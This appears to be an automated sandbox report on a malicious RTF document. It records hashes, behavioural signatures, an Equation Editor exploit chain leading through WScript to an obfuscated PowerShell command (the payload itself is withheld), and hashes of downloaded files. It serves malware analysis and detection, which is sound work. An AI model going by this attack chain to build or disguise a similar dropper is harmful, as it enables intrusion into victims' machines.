Analysis
max time kernel: 101s
max time network: 19s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 30-07-2024 01:06
Static task: static1
Behavioral task: behavioral1
  Sample: 112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf
  Resource: win10v2004-20240709-en
General
Target: 112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf
Size: 94KB
MD5: f7c34c11bb5d9cdcece78edae0beff42
SHA1: 96f2510fbb5c6203e21ead4dd55daaab59a86f4e
SHA256: 112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3
SHA512: 9b733c0d88c98adfe48e45079276ff7e059540445aa576b9eb637ac5c6881586336740384d71ab8a98e24b6f13c76d2ad88dd4437077dabd6a8d7829cd037164
SSDEEP: 768:GS6MQ5k2WKcczrYFUoNVEbHfwFclPY49Ug+:tSWKccXYtclPYaA
Malware Config
Signatures
Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid   process
  3     1184  EQNEDT32.EXE
  5     2836  powershell.exe
Drops file in System32 directory (1 IoCs)
Processes:
  description                   ioc                                                                                                                        process
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Drops file in Windows directory (1 IoCs)
Processes:
  description                   ioc                                 process
  File opened for modification  C:\Windows\Debug\WIA\wiatrace.log   WINWORD.EXE
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 4 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description  ioc                                                              process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      EQNEDT32.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor (1 TTPs, 1 IoCs)
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes:
  pid   process
  1656  WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid   process
  2836  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description               pid   process
  Token: SeDebugPrivilege   2836  powershell.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid   process
  1656  WINWORD.EXE
  1656  WINWORD.EXE
Suspicious use of WriteProcessMemory (12 IoCs)
Processes:
  description                         pid   process        target process
  PID 1184 wrote to memory of 2732    1184  EQNEDT32.EXE   WScript.exe
  PID 1184 wrote to memory of 2732    1184  EQNEDT32.EXE   WScript.exe
  PID 1184 wrote to memory of 2732    1184  EQNEDT32.EXE   WScript.exe
  PID 1184 wrote to memory of 2732    1184  EQNEDT32.EXE   WScript.exe
  PID 2732 wrote to memory of 2836    2732  WScript.exe    powershell.exe
  PID 2732 wrote to memory of 2836    2732  WScript.exe    powershell.exe
  PID 2732 wrote to memory of 2836    2732  WScript.exe    powershell.exe
  PID 2732 wrote to memory of 2836    2732  WScript.exe    powershell.exe
  PID 1656 wrote to memory of 2980    1656  WINWORD.EXE    splwow64.exe
  PID 1656 wrote to memory of 2980    1656  WINWORD.EXE    splwow64.exe
  PID 1656 wrote to memory of 2980    1656  WINWORD.EXE    splwow64.exe
  PID 1656 wrote to memory of 2980    1656  WINWORD.EXE    splwow64.exe
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3.rtf"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 1656
  C:\Windows\splwow64.exe (depth 2)
    Command line: C:\Windows\splwow64.exe 12288
    PID: 2980
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (depth 1)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  PID: 1184
  C:\Windows\SysWOW64\WScript.exe (depth 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2732
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command [obfuscated PowerShell script with embedded base64 ciphertext; not reproduced here]
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2836
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 19KB
MD5: 6ba9fff1680da3acfaec679aa89477db
SHA1: d18b3135bfeb4303df38ce7bef7cdaa5618f0dcc
SHA256: 6adf034365210fa83f8568eba4d6b88e3608f2f01574743ed20bf797899b7f4f
SHA512: e3613842bda578fb5dedc07db42804d1d442292b2e6014309051b96f74df80d31d44448597a1ff5feb4e8ef5788191ab1ae3905c4832baba160e1b9f07a83448

Filesize: 403KB
MD5: 1e06a0b540d76abb6e2712fa7e37138a
SHA1: 1e7a793fe2bcd27f2757969043cdf5f5231e977e
SHA256: 7d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9
SHA512: 2b7cde726ee68b9d1cfa24c4413ebf5ab9f026b758d7cc4b6d9c6ad4eaf4b626abdde06e55d529ff2092e06f16dc8f86df935db118727733b1cd6c7284a5184a

MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e